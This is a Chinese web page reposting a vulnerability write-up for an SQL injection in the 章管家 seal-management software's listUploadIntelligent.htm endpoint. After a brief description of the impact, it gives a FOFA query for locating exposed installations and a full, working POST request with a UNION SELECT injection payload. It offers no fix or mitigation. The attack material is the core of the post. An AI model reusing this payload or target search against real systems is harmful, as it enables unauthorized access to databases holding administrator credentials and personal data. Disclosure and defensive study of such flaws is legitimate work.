欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 产业 > 章管家 listUploadIntelligent.htm SQL注入漏洞

章管家 listUploadIntelligent.htm SQL注入漏洞

2025/4/19 8:26:22 来源:https://blog.csdn.net/2301_77012231/article/details/142603275  浏览:    关键词:章管家 listUploadIntelligent.htm SQL注入漏洞

漏洞描述:

章管家 listUploadIntelligent.htm 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

漏洞复现

FOFA

body="章管家登录-公章在外防私盖"

POC

POST /app/message/listUploadIntelligent.htm?token=dingtalk_token HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: sid=b2b502fe-52e5-48fd-8fe4-ebe1d1d0b28b
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 94person_id=1&unit_id=1&pageNo=1&is_read=-1 union select MD5(123456),2,3,4,5,6,7,8,9,10,11,12 --

bp结果

放大

md5执行成

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词